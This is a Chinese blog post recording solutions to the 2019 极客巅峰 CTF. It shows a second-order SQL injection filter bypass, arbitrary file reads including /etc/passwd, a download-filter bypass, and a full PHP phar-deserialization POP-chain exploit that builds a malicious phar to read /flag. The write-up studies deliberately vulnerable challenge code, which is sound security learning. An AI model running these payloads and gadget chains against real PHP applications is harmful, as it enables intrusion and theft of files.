2019极客巅峰ctf记录

ctf

字数统计: 2.7k阅读时长: 14 min

 2019/10/20   Share

2019极客巅峰ctf记录

周六抽时间做了2019极客巅峰的ctf,发现自己是真的菜，需要找个地方沉淀一下，所以将做出的题记录记录在博客

aweb_1

mark

提示admin才能看到flag1
mark

发现注册处用户名参数存在二次注入，有过滤，使用`name=admin’//and//‘3`绕过
mark
注册成功，用户名：assssssssss@qq.com，密码：123456’,登录成功，成功获取到flag
mark

upload

这道题线上没做出来，比赛结束后研究了一波，:(
mark

打开题目,首页有三个模块，分别为

查看文件：file.php?file=
mark

上传文件：upload_file.php
mark

下载文件：download.php
mark

下载文件页面泄露了部分的源代码，代码如下：


$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}

这里存在文件下载漏洞，但是存在过滤，暂时无法绕过

查看页面源代码发现hint:提示flag文件的位置位于/flag
mark

回过头发现查看文件模块存在任意文件读取:/file.php?file=/etc/passwd
mark

尝试直接读取flag文件。失败：
mark

尝试读取download.php:/file.php?file=download.php读取失败
mark
修改为绝对路径/file.php?file=/var/www/html/download.php,读取成功
mark
完整源码如下：


<html>
<pre>    
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}
</pre>
</html>
<?php
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php'; //获取文件名称
                $dir ="./";  //相对于网站根目录的下载目录路径
                $down_host = $_SERVER['HTTP_HOST'].'/'; //当前域名
                //判断如果文件存在,则跳转到下载路径
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );    
                    //告诉浏览器这是一个文件流格式的文件
                    Header ( "Content-type: application/octet-stream" );
                    //请求范围的度量单位
                    Header ( "Accept-Ranges: bytes" );
                    //Content-Length是指定包含于请求或响应中数据的字节长度
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    //用来告诉浏览器，文件是可以当做附件被下载，下载后的文件名称为$file_name该变量的值。
                    Header ( "Content-Disposition: attachment; filename=" . $filename );    
                    //读取文件内容并直接输出到浏览器
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}    
//return safe name
function safe_replace($string) {
    $string = str_replace('%20','&quot;',$string);
    $string = str_replace('%27','&quot;',$string);
    $string = str_replace('%2527','&quot;',$string);
    $string = str_replace('*','&quot;',$string);
    $string = str_replace('"','&quot;',$string);
    $string = str_replace("'",'&quot;',$string);
    $string = str_replace('"','&quot;',$string);
    $string = str_replace(';','&quot;',$string);
    $string = str_replace('<','&lt;',$string);
    $string = str_replace('>','&gt;',$string);
    $string = str_replace("{",'&quot;',$string);
    $string = str_replace('}','&quot;',$string);
    $string = str_replace('\\','',$string);
    return $string;
}

其中可以利用$string = str_replace('\\','',$string);进行文件下载绕过，绕过方法如下：

/download.php?name=ind\\ex
mark

通过文件读取和文件下载结合获取源代码：

index.php


<?php 
header("content-type:text/html;charset=utf-8");  
include 'base.php';
?>

base.php


<?php 
    session_start(); 
?> 
<!DOCTYPE html> 
<html> 
<head> 
    <meta charset="utf-8"> 
    <title>upload_or_not</title> 
    <link rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/css/bootstrap.min.css"> 
    <script src="https://cdn.staticfile.org/jquery/2.1.1/jquery.min.js"></script> 
    <script src="https://cdn.staticfile.org/twitter-bootstrap/3.3.7/js/bootstrap.min.js"></script> 
</head> 
<body> 
    <nav class="navbar navbar-default" role="navigation"> 
        <div class="container-fluid"> 
        <div class="navbar-header"> 
            <a class="navbar-brand" href="index.php">首页</a> 
        </div> 
            <ul class="nav navbar-nav navbra-toggle"> 
                <li class="active"><a href="file.php?file=">查看文件</a></li> 
                <li><a href="upload_file.php">上传文件</a></li>
                <li><a href="download.php">下载文件</a></li>
            </ul> 
            <ul class="nav navbar-nav navbar-right"> 
                <li><a href="index.php"><span class="glyphicon glyphicon-user"></span><?php echo $_SERVER['REMOTE_ADDR'];?></a></li> 
            </ul> 
        </div> 
    </nav> 
</body> 
</html> 
<!--flag is in /flag-->

file.php


<?php 
header("content-type:text/html;charset=utf-8");  
include 'function.php'; 
include 'class.php';
$file = $_GET["file"] ? $_GET['file'] : ""; 
if(empty($file)) { 
    echo "<h2>There is no file to show!<h2/>"; 
}
if(preg_match('/http|https|file:|gopher|dict|\.\/|\.\.|flag/i',$file)) {
            die('hacker!'); 
}elseif(!preg_match('/\//i',$file))
{
    die('hacker!');
}
$show = new Show(); 
if(file_exists($file)) { 
    $show->source = $file; 
    $show->_show(); 
} else if (!empty($file)){ 
    die('file doesn\'t exists.'); 
} 
?>

function.php

<?php
//show_source(__FILE__); 
include "base.php"; 
header("Content-type: text/html;charset=utf-8"); 
error_reporting(0); 
function upload_file_do() { 
    global $_FILES; 
    $filename = md5($_FILES["file"]["name"]).".jpg"; 
    //mkdir("upload",0777); 
    if(file_exists("upload/" . $filename)) { 
        unlink($filename); 
    } 
    move_uploaded_file($_FILES["file"]["tmp_name"],"upload/" . $filename); 
    echo '<script type="text/javascript">alert("上传成功!");</script>'; 
} 
function upload_file() { 
    global $_FILES; 
    if(upload_file_check()) { 
        upload_file_do(); 
    } 
} 
function upload_file_check() { 
    global $_FILES; 
    $allowed_types = array("gif","jpeg","jpg","png"); 
    $temp = explode(".",$_FILES["file"]["name"]); 
    $extension = end($temp); 
    if(empty($extension)) { 
        //echo "<h4>请选择上传的文件:" . "<h4/>"; 
    } 
    else{ 
        if(in_array($extension,$allowed_types)) { 
            return true; 
        } 
        else { 
            echo '<script type="text/javascript">alert("Invalid file!");</script>'; 
            return false; 
        } 
    } 
} 
?>

upload_file.php


<?php
include 'function.php'; 
upload_file(); 
?> 
<html> 
<head> 
<meta charest="utf-8"> 
<title>文件上传</title> 
</head> 
<body> 
<div align = "center"> 
        <h1>上传的文件保存在/upload/md5($_FILES["file"]["name"]).".jpg"</h1> 
</div> 
<style> 
    p{ margin:0 auto} 
</style> 
<div> 
<form action="upload_file.php" method="post" enctype="multipart/form-data"> 
    <label for="file">文件名:</label> 
    <input type="file" name="file" id="file"><br> 
    <input type="submit" name="submit" value="提交"> 
</div>     
</body> 
</html>

class.php


<html>
<pre>    
$name = $_GET['name'];
$url = $_SERVER['QUERY_STRING'];
if (isset($name)){
    if (preg_match('/\.|etc|var|tmp|usr/i', $url)){
        echo("hacker!");
    }
    else{
        if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
            echo ("hacker!");
        }
        else{
            $name = safe_replace($name);
            if (preg_match('/base|class|file|function|index|upload_file/i', $name)){
                $filename = $name.'.php';
                $dir ="./";
                $down_host = $_SERVER['HTTP_HOST'].'/';
                if(file_exists(__DIR__.'/'.$dir.$filename)){
                    $file = fopen ( $dir.$filename, "rb" );
                    Header ( "Content-type: application/octet-stream" );
                    Header ( "Accept-Ranges: bytes" );
                    Header ( "Accept-Length: " . filesize ( $dir.$filename ) );
                    Header ( "Content-Disposition: attachment; filename=" . $filename );
                    echo fread ( $file, filesize ( $dir . $filename ) );
                    fclose ( $file );
                    exit ();
                }else{
                    echo ("file doesn't exist.");
                }
            }
            if (preg_match('/flag/i', $name)){
                echo ("hacker!");
            }
        }
    }
}
</pre>
</html>
<?php    
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array();
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        echo $this->file;
    }
}    
class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new Show('index.php');
        $this->str->source = $this->test;    
    }
    public function __destruct()
    {
        $this->str->_show();
    }
}
?>

代码审计后发现不能通过文件读取和文件下载直接获取flag，因为这里的过滤无法绕过

通过class.php代码猜测题目应该是考察的应该是php反序列化漏洞,但是并没有找到unserialize函数,不过发现file.php当中以下的代码可能存在phar反序列化漏洞的问题，php一些函数在使用phar伪协议解析phar文件时，会对phar文件当中的meta-data部分进行反序列化，其中file_exists函数就是其中之一
mark

所以这道题的正确思路是应该是通过phar反序列化获取flag,思路如下：

构造pop链，生成phar文件，上传->通过文件读取，使用phar伪协议解析上传的phar文件->触发file_exists函数，产生php反序列化漏洞->通过php反序列化获取flag

构造pop链，生成phar文件：poc如下：


<?php    
class Show
{
    public $source;
    public $str;
    public function __construct($file)
    {
        $this->source='/flag';
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __toString()
    {
        $text= $this->source;
        $text = base64_encode(file_get_contents($text));
        return $text;
    }
    public function __set($key,$value)
    {
        $this->$key = $value;
    }
    public function _show()
    {
        if(preg_match('/http|https|file:|gopher|dict|\.\.|flag/i',$this->source)) {
            die('hacker!');
        } else {
            highlight_file($this->source);
        }
        
    }
    public function __wakeup()
    {
        if(preg_match("/http|https|file:|gopher|dict|\.\./i", $this->source)) {
            echo "hacker~";
            $this->source = "index.php";
        }
    }
}
class S6ow
{
    public $file;
    public $params;
    public function __construct()
    {
        $this->params = array("_show"=>"file_get");
        $this->file=new Show();
    }
    public function __get($key)
    {
        return $this->params[$key];
    }
    public function __call($name, $arguments)
    {
        if($this->{$name})
            $this->{$this->{$name}}($arguments);
    }
    public function file_get($value)
    {
        echo $this->file;
    }
}    
class Sh0w
{
    public $test;
    public $str;
    public function __construct($name)
    {
        $this->str = new S6ow();    
    }
    public function __destruct()
    {
        $this->str->_show();
    }
}
$phar = new Phar("poc.phar"); //后缀名必须为phar
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub
$o = new sh0w();
$phar->setMetadata($o); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();
?>

触发过程：

sh0w对象反序列化时调用__destruct，调用了S6ow对象的_show方法，由于_show方法不存在，从而调用了__call，此时$this->{$name}的值变为了_show，在进行$this->{$name}判断时，由于_show属性也不存在，从而触发了__get方法，$this->{$name}的值被赋为file_get，从而调用了file_get函数，由于一开始$this->file的值被设为了Show对象，所以这里将Show对象输出，触发了Show对象的__ToString方法，成功绕过了过滤读取flag